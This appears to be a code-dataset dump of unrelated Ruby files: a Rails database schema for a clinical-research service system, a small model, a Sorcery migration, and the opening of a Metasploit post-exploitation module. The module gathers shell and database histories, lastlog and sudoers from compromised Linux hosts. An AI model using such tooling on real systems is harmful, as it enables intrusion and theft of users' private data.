create_table "human_subjects_info", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "protocol_id"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.string "nct_number"
t.index ["protocol_id"], name: "index_human_subjects_info_on_protocol_id"
end
create_table "identities", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.string "ldap_uid"
t.string "email"
t.string "last_name"
t.string "first_name"
t.string "era_commons_name"
t.string "credentials"
t.string "subspecialty"
t.string "phone"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.boolean "catalog_overlord"
t.string "credentials_other"
t.string "encrypted_password", default: "", null: false
t.string "reset_password_token"
t.datetime "reset_password_sent_at"
t.datetime "remember_created_at"
t.integer "sign_in_count", default: 0
t.datetime "current_sign_in_at"
t.datetime "last_sign_in_at"
t.string "current_sign_in_ip"
t.string "last_sign_in_ip"
t.text "reason"
t.string "company"
t.boolean "approved"
t.string "time_zone", default: "Eastern Time (US & Canada)"
t.bigint "professional_organization_id"
t.string "orcid", limit: 19
t.index ["approved"], name: "index_identities_on_approved"
t.index ["email"], name: "index_identities_on_email"
t.index ["last_name"], name: "index_identities_on_last_name"
t.index ["ldap_uid"], name: "index_identities_on_ldap_uid", unique: true
t.index ["reset_password_token"], name: "index_identities_on_reset_password_token", unique: true
end
create_table "impact_areas", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "protocol_id"
t.string "name"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.string "other_text"
t.index ["protocol_id"], name: "index_impact_areas_on_protocol_id"
end
create_table "investigational_products_info", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "protocol_id"
t.string "ind_number"
t.boolean "ind_on_hold"
t.string "inv_device_number"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.string "exemption_type", default: ""
t.index ["protocol_id"], name: "index_investigational_products_info_on_protocol_id"
end
create_table "ip_patents_info", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "protocol_id"
t.string "patent_number"
t.text "inventors"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.index ["protocol_id"], name: "index_ip_patents_info_on_protocol_id"
end
create_table "irb_records", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8", force: :cascade do |t|
t.bigint "human_subjects_info_id"
t.string "pro_number"
t.string "irb_of_record"
t.string "submission_type"
t.date "initial_irb_approval_date"
t.date "irb_approval_date"
t.date "irb_expiration_date"
t.boolean "approval_pending"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.index ["human_subjects_info_id"], name: "index_irb_records_on_human_subjects_info_id"
end
create_table "irb_records_study_phases", id: false, options: "ENGINE=InnoDB DEFAULT CHARSET=utf8", force: :cascade do |t|
t.bigint "irb_record_id"
t.bigint "study_phase_id"
t.index ["irb_record_id"], name: "index_irb_records_study_phases_on_irb_record_id"
t.index ["study_phase_id"], name: "index_irb_records_study_phases_on_study_phase_id"
end
create_table "line_items", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "service_request_id"
t.bigint "sub_service_request_id"
t.bigint "service_id"
t.boolean "optional", default: true
t.integer "quantity"
t.datetime "complete_date"
t.datetime "in_process_date"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.integer "units_per_quantity", default: 1
t.index ["service_id"], name: "index_line_items_on_service_id"
t.index ["service_request_id"], name: "index_line_items_on_service_request_id"
t.index ["sub_service_request_id"], name: "index_line_items_on_sub_service_request_id"
end
create_table "line_items_visits", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "arm_id"
t.bigint "line_item_id"
t.integer "subject_count"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.index ["arm_id"], name: "index_line_items_visits_on_arm_id"
t.index ["line_item_id"], name: "index_line_items_visits_on_line_item_id"
end
create_table "messages", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "notification_id"
t.bigint "to"
t.bigint "from"
t.string "email"
t.text "body"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.index ["from"], name: "index_messages_on_from"
t.index ["notification_id"], name: "index_messages_on_notification_id"
t.index ["to"], name: "index_messages_on_to"
end
create_table "notes", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "identity_id"
t.text "body"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.bigint "notable_id"
t.string "notable_type"
t.index ["identity_id"], name: "index_notes_on_identity_id"
t.index ["identity_id"], name: "index_notes_on_user_id"
t.index ["notable_id", "notable_type"], name: "index_notes_on_notable_id_and_notable_type"
end
create_table "notifications", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "sub_service_request_id"
t.bigint "originator_id"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.string "subject"
t.bigint "other_user_id"
t.boolean "read_by_originator"
t.boolean "read_by_other_user"
t.boolean "shared"
t.index ["originator_id"], name: "index_notifications_on_originator_id"
t.index ["sub_service_request_id"], name: "index_notifications_on_sub_service_request_id"
end
create_table "options", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "question_id"
t.text "content", null: false
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.index ["question_id"], name: "index_options_on_question_id"
end
create_table "organizations", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.string "type"
t.string "name"
t.integer "order"
t.string "css_class", default: ""
t.text "description"
t.bigint "parent_id"
t.string "abbreviation"
t.text "ack_language"
t.boolean "process_ssrs", default: false
t.boolean "is_available", default: true
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.boolean "use_default_statuses", default: true
t.boolean "survey_completion_alerts", default: false
t.index ["is_available"], name: "index_organizations_on_is_available"
t.index ["parent_id"], name: "index_organizations_on_parent_id"
end
create_table "past_statuses", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "sub_service_request_id"
t.string "status"
t.datetime "date"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.bigint "changed_by_id"
t.string "new_status"
t.index ["changed_by_id"], name: "index_past_statuses_on_changed_by_id"
t.index ["sub_service_request_id"], name: "index_past_statuses_on_sub_service_request_id"
end
create_table "past_subsidies", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "sub_service_request_id"
t.integer "total_at_approval"
t.bigint "approved_by"
t.datetime "approved_at"
t.datetime "created_at"
t.datetime "updated_at"
t.float "percent_subsidy", default: 0.0
t.index ["approved_by"], name: "index_past_subsidies_on_approved_by"
t.index ["sub_service_request_id"], name: "index_past_subsidies_on_sub_service_request_id"
end
create_table "patient_registrars", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.integer "identity_id"
t.integer "organization_id"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.index ["identity_id"], name: "index_patient_registrars_on_identity_id"
t.index ["organization_id"], name: "index_patient_registrars_on_organization_id"
end
create_table "payment_uploads", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "payment_id"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.string "file_file_name"
t.string "file_content_type"
t.integer "file_file_size"
t.datetime "file_updated_at"
t.index ["payment_id"], name: "index_payment_uploads_on_payment_id"
end
create_table "payments", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "sub_service_request_id"
t.date "date_submitted"
t.decimal "amount_invoiced", precision: 12, scale: 4
t.decimal "amount_received", precision: 12, scale: 4
t.date "date_received"
t.string "payment_method"
t.text "details"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.float "percent_subsidy"
t.index ["sub_service_request_id"], name: "index_payments_on_sub_service_request_id"
end
create_table "permissible_values", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.string "key"
t.string "value"
t.string "concept_code"
t.bigint "parent_id"
t.integer "sort_order"
t.string "category"
t.boolean "default"
t.boolean "reserved"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.boolean "is_available"
end
create_table "pricing_maps", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "service_id"
t.string "unit_type"
t.decimal "unit_factor", precision: 5, scale: 2
t.decimal "percent_of_fee", precision: 5, scale: 2
t.decimal "full_rate", precision: 12, scale: 4
t.boolean "exclude_from_indirect_cost"
t.integer "unit_minimum"
t.decimal "federal_rate", precision: 12, scale: 4
t.decimal "corporate_rate", precision: 12, scale: 4
t.date "effective_date"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.date "display_date"
t.decimal "other_rate", precision: 12, scale: 4
t.decimal "member_rate", precision: 12, scale: 4
t.integer "units_per_qty_max", default: 10000
t.string "quantity_type"
t.string "otf_unit_type", default: "N/A"
t.integer "quantity_minimum", default: 1
t.index ["service_id"], name: "index_pricing_maps_on_service_id"
end
create_table "pricing_setups", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "organization_id"
t.date "display_date"
t.date "effective_date"
t.boolean "charge_master"
t.decimal "federal", precision: 5, scale: 2
t.decimal "corporate", precision: 5, scale: 2
t.decimal "other", precision: 5, scale: 2
t.decimal "member", precision: 5, scale: 2
t.string "college_rate_type"
t.string "federal_rate_type"
t.string "industry_rate_type"
t.string "investigator_rate_type"
t.string "internal_rate_type"
t.string "foundation_rate_type"
t.datetime "deleted_at"
t.string "unfunded_rate_type"
t.index ["organization_id"], name: "index_pricing_setups_on_organization_id"
end
create_table "professional_organizations", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.text "name"
t.string "org_type"
t.bigint "parent_id"
end
create_table "project_roles", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "protocol_id"
t.bigint "identity_id"
t.string "project_rights"
t.string "role"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.string "role_other"
t.boolean "epic_access", default: false
t.index ["identity_id"], name: "index_project_roles_on_identity_id"
t.index ["protocol_id"], name: "index_project_roles_on_protocol_id"
end
create_table "protocol_filters", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "identity_id"
t.string "search_name"
t.boolean "show_archived"
t.string "search_query"
t.string "with_organization"
t.string "with_status"
t.datetime "created_at"
t.datetime "updated_at"
t.string "admin_filter"
t.string "with_owner"
end
create_table "protocol_merges", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.integer "master_protocol_id"
t.integer "merged_protocol_id"
t.integer "identity_id"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "protocols", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.string "type"
t.integer "next_ssr_id"
t.string "short_title"
t.text "title"
t.string "sponsor_name"
t.text "brief_description"
t.decimal "indirect_cost_rate", precision: 6, scale: 2
t.string "study_phase"
t.string "udak_project_number"
t.string "funding_rfa"
t.string "funding_status"
t.string "potential_funding_source"
t.datetime "potential_funding_start_date"
t.string "funding_source"
t.datetime "funding_start_date"
t.string "federal_grant_serial_number"
t.string "federal_grant_title"
t.string "federal_grant_code_id"
t.string "federal_non_phs_sponsor"
t.string "federal_phs_sponsor"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.string "potential_funding_source_other"
t.string "funding_source_other"
t.datetime "last_epic_push_time"
t.string "last_epic_push_status"
t.datetime "start_date"
t.datetime "end_date"
t.datetime "initial_budget_sponsor_received_date"
t.datetime "budget_agreed_upon_date"
t.bigint "initial_amount"
t.bigint "initial_amount_clinical_services"
t.bigint "negotiated_amount"
t.bigint "negotiated_amount_clinical_services"
t.string "billing_business_manager_static_email"
t.datetime "recruitment_start_date"
t.datetime "recruitment_end_date"
t.boolean "selected_for_epic"
t.boolean "archived", default: false
t.bigint "study_type_question_group_id"
t.integer "research_master_id"
t.integer "sub_service_requests_count", default: 0
t.boolean "rmid_validated", default: false
t.boolean "locked"
t.string "guarantor_contact"
t.string "guarantor_phone"
t.string "guarantor_email"
t.index ["next_ssr_id"], name: "index_protocols_on_next_ssr_id"
end
create_table "question_responses", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "question_id"
t.bigint "response_id"
t.text "content"
t.boolean "required", null: false
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.index ["question_id"], name: "index_question_responses_on_question_id"
t.index ["response_id"], name: "index_question_responses_on_response_id"
end
create_table "questions", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "section_id"
t.boolean "is_dependent", null: false
t.text "content", null: false
t.string "question_type", null: false
t.text "description"
t.boolean "required", null: false
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.bigint "depender_id"
t.index ["depender_id"], name: "index_questions_on_depender_id"
t.index ["section_id"], name: "index_questions_on_section_id"
end
create_table "quick_questions", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.string "to"
t.string "from"
t.text "body"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "reports", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "sub_service_request_id"
t.string "xlsx_file_name"
t.string "xlsx_content_type"
t.integer "xlsx_file_size"
t.datetime "xlsx_updated_at"
t.string "report_type"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "research_types_info", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "protocol_id"
t.boolean "human_subjects"
t.boolean "vertebrate_animals"
t.boolean "investigational_products"
t.boolean "ip_patents"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.index ["protocol_id"], name: "index_research_types_info_on_protocol_id"
end
create_table "response_filters", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "identity_id"
t.string "name"
t.string "of_type"
t.string "with_state"
t.string "with_survey"
t.string "start_date"
t.string "end_date"
t.boolean "include_incomplete"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "responses", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "survey_id"
t.bigint "identity_id"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.bigint "respondable_id"
t.string "respondable_type"
t.index ["identity_id"], name: "index_responses_on_identity_id"
t.index ["respondable_id", "respondable_type"], name: "index_responses_on_respondable_id_and_respondable_type"
t.index ["survey_id"], name: "index_responses_on_survey_id"
end
create_table "revenue_code_ranges", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.integer "from"
t.integer "to"
t.float "percentage"
t.bigint "applied_org_id"
t.string "vendor"
t.integer "version"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "sections", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "survey_id"
t.string "title"
t.text "description"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.index ["survey_id"], name: "index_sections_on_survey_id"
end
create_table "service_providers", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "identity_id"
t.bigint "organization_id"
t.boolean "is_primary_contact"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.boolean "hold_emails"
t.datetime "deleted_at"
t.index ["identity_id"], name: "index_service_providers_on_identity_id"
t.index ["organization_id"], name: "index_service_providers_on_organization_id"
end
create_table "service_relations", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "service_id"
t.bigint "related_service_id"
t.boolean "required"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.index ["related_service_id"], name: "index_service_relations_on_related_service_id"
t.index ["service_id"], name: "index_service_relations_on_service_id"
end
create_table "service_requests", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "protocol_id"
t.string "status"
t.boolean "approved"
t.datetime "submitted_at"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.date "original_submitted_date"
t.index ["protocol_id"], name: "index_service_requests_on_protocol_id"
t.index ["status"], name: "index_service_requests_on_status"
end
create_table "services", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.string "name"
t.string "abbreviation"
t.integer "order"
t.text "description"
t.boolean "is_available", default: true
t.decimal "service_center_cost", precision: 12, scale: 4
t.string "cpt_code"
t.string "charge_code"
t.string "revenue_code"
t.bigint "organization_id"
t.string "order_code"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.boolean "send_to_epic", default: false
t.bigint "revenue_code_range_id"
t.boolean "one_time_fee", default: false
t.integer "line_items_count", default: 0
t.text "components"
t.string "eap_id"
t.index ["is_available"], name: "index_services_on_is_available"
t.index ["one_time_fee"], name: "index_services_on_one_time_fee"
t.index ["organization_id"], name: "index_services_on_organization_id"
end
create_table "sessions", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.string "session_id", null: false
t.text "data"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.index ["session_id"], name: "index_sessions_on_session_id"
t.index ["updated_at"], name: "index_sessions_on_updated_at"
end
create_table "settings", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.string "key"
t.text "value"
t.string "data_type"
t.string "friendly_name"
t.text "description"
t.string "group"
t.string "version"
t.string "parent_key"
t.string "parent_value"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.index ["key"], name: "index_settings_on_key", unique: true
end
create_table "short_interactions", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "identity_id"
t.string "name"
t.string "email"
t.string "institution"
t.integer "duration_in_minutes"
t.string "subject"
t.text "note"
t.datetime "created_at"
t.datetime "updated_at"
t.string "interaction_type"
t.index ["identity_id"], name: "index_short_interactions_on_identity_id"
end
create_table "study_phases", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.integer "order"
t.string "phase"
t.integer "version", default: 1
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "study_type_answers", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "protocol_id"
t.bigint "study_type_question_id"
t.boolean "answer"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "study_type_question_groups", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.integer "version"
t.boolean "active", default: false
t.datetime "created_at"
t.datetime "updated_at"
end
create_table "study_type_questions", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.integer "order"
t.text "question"
t.string "friendly_id"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.bigint "study_type_question_group_id"
end
create_table "study_types", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "protocol_id"
t.string "name"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.index ["protocol_id"], name: "index_study_types_on_protocol_id"
end
create_table "sub_service_requests", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "service_request_id"
t.bigint "organization_id"
t.bigint "owner_id"
t.string "ssr_id"
t.string "status"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.datetime "consult_arranged_date"
t.datetime "requester_contacted_date"
t.boolean "nursing_nutrition_approved", default: false
t.boolean "lab_approved", default: false
t.boolean "imaging_approved", default: false
t.boolean "committee_approved", default: false
t.boolean "in_work_fulfillment", default: false
t.string "routing"
t.text "org_tree_display"
t.bigint "service_requester_id"
t.datetime "submitted_at"
t.bigint "protocol_id"
t.boolean "imported_to_fulfillment", default: false
t.boolean "synch_to_fulfillment"
t.index ["organization_id"], name: "index_sub_service_requests_on_organization_id"
t.index ["owner_id"], name: "index_sub_service_requests_on_owner_id"
t.index ["protocol_id"], name: "index_sub_service_requests_on_protocol_id"
t.index ["service_request_id"], name: "index_sub_service_requests_on_service_request_id"
t.index ["service_requester_id"], name: "index_sub_service_requests_on_service_requester_id"
t.index ["ssr_id"], name: "index_sub_service_requests_on_ssr_id"
t.index ["status"], name: "index_sub_service_requests_on_status"
end
create_table "submission_emails", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "organization_id"
t.string "email"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.index ["organization_id"], name: "index_submission_emails_on_organization_id"
end
create_table "subsidies", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.boolean "overridden"
t.bigint "sub_service_request_id"
t.integer "total_at_approval"
t.string "status", default: "Pending"
t.bigint "approved_by"
t.datetime "approved_at"
t.float "percent_subsidy", default: 0.0
t.index ["sub_service_request_id"], name: "index_subsidies_on_sub_service_request_id"
end
create_table "subsidy_maps", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "organization_id"
t.decimal "max_dollar_cap", precision: 12, scale: 4, default: "0.0"
t.decimal "max_percentage", precision: 5, scale: 2, default: "0.0"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.float "default_percentage", default: 0.0
t.text "instructions"
t.index ["organization_id"], name: "index_subsidy_maps_on_organization_id"
end
create_table "super_users", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "identity_id"
t.bigint "organization_id"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.boolean "access_empty_protocols", default: false
t.boolean "billing_manager"
t.boolean "allow_credit"
t.boolean "hold_emails", default: true
t.index ["identity_id"], name: "index_super_users_on_identity_id"
t.index ["organization_id"], name: "index_super_users_on_organization_id"
end
create_table "surveys", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.string "title", null: false
t.text "description"
t.string "access_code", null: false
t.integer "version", null: false
t.boolean "active", null: false
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.string "type"
t.bigint "surveyable_id"
t.string "surveyable_type"
t.index ["surveyable_id", "surveyable_type"], name: "index_surveys_on_surveyable_id_and_surveyable_type"
end
create_table "taggings", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "tag_id"
t.bigint "taggable_id"
t.string "taggable_type"
t.bigint "tagger_id"
t.string "tagger_type"
t.string "context", limit: 128
t.datetime "created_at"
t.index ["tag_id", "taggable_id", "taggable_type", "context", "tagger_id", "tagger_type"], name: "taggings_idx", unique: true
t.index ["taggable_id", "taggable_type", "context"], name: "index_taggings_on_taggable_id_and_taggable_type_and_context"
t.index ["tagger_id"], name: "index_taggings_on_tagger_id"
end
create_table "tags", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.string "name"
t.integer "taggings_count", default: 0
t.index ["name"], name: "index_tags_on_name", unique: true
end
create_table "tokens", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "service_request_id"
t.bigint "identity_id"
t.string "token"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.index ["identity_id"], name: "index_tokens_on_identity_id"
t.index ["service_request_id"], name: "index_tokens_on_service_request_id"
end
create_table "vertebrate_animals_info", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "protocol_id"
t.string "iacuc_number"
t.string "name_of_iacuc"
t.datetime "iacuc_approval_date"
t.datetime "iacuc_expiration_date"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.index ["protocol_id"], name: "index_vertebrate_animals_info_on_protocol_id"
end
create_table "visit_groups", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.string "name"
t.bigint "arm_id"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.integer "position"
t.integer "day"
t.integer "window_before", default: 0
t.integer "window_after", default: 0
t.index ["arm_id"], name: "index_visit_groups_on_arm_id"
end
create_table "visits", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.integer "quantity", default: 0
t.string "billing"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.integer "research_billing_qty", default: 0
t.integer "insurance_billing_qty", default: 0
t.integer "effort_billing_qty", default: 0
t.bigint "line_items_visit_id"
t.bigint "visit_group_id"
t.index ["line_items_visit_id"], name: "index_visits_on_line_items_visit_id"
t.index ["research_billing_qty"], name: "index_visits_on_research_billing_qty"
t.index ["visit_group_id"], name: "index_visits_on_visit_group_id"
end
add_foreign_key "editable_statuses", "organizations"
add_foreign_key "options", "questions"
add_foreign_key "question_responses", "questions"
add_foreign_key "question_responses", "responses"
add_foreign_key "questions", "options", column: "depender_id"
add_foreign_key "questions", "sections"
add_foreign_key "responses", "identities"
add_foreign_key "responses", "surveys"
add_foreign_key "sections", "surveys"
end
| 41.012127 | 153 | 0.725645 |
919fbbcfe8e319ed5ed010d6e8a4c195a1ca003b | 522 | class Item < ApplicationRecord
belongs_to :category
has_many :line_items
has_many :carts, through: :line_items
has_many :comments
validates :name, presence: true
validates :name, uniqueness: true
validates :price, presence: true
validates :price, numericality: {message: "must be a number"}
validates :inventory, presence: true
validates :inventory, numericality: {message: "must be a number"}
def self.available_items
self.all.select do |item|
item.inventory != 0
end
end
end
| 26.1 | 67 | 0.720307 |
01f56af733c960281f673d61844775d64061ba22 | 39 | # typed: true
def foo = 42 rescue nil
| 9.75 | 23 | 0.666667 |
03103ffc21ca7c1173a183ffc5c265942b403168 | 441 | class SorceryBruteForceProtection < ActiveRecord::Migration
def self.up
add_column :<%= model_class_name.tableize %>, :failed_logins_count, :integer, :default => 0
add_column :<%= model_class_name.tableize %>, :lock_expires_at, :datetime, :default => nil
end
def self.down
remove_column :<%= model_class_name.tableize %>, :lock_expires_at
remove_column :<%= model_class_name.tableize %>, :failed_logins_count
end
end | 40.090909 | 95 | 0.736961 |
184445c3f7b8644971f2cd6c94af63aff1f81dfd | 3,725 | ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post
include Msf::Post::File
include Msf::Post::Linux::System
def initialize(info = {})
super(update_info(info,
'Name' => 'Linux Gather User History',
'Description' => %q{
This module gathers the following user-specific information:
shell history, MySQL history, PostgreSQL history, MongoDB history,
Vim history, lastlog, and sudoers.
},
'License' => MSF_LICENSE,
'Author' =>
[
# based largely on get_bash_history function by Stephen Haywood
'ohdae <bindshell[at]live.com>'
],
'Platform' => ['linux'],
'SessionTypes' => ['shell', 'meterpreter']
))
end
def run
distro = get_sysinfo
print_good('Info:')
print_good("\t#{distro[:version]}")
print_good("\t#{distro[:kernel]}")
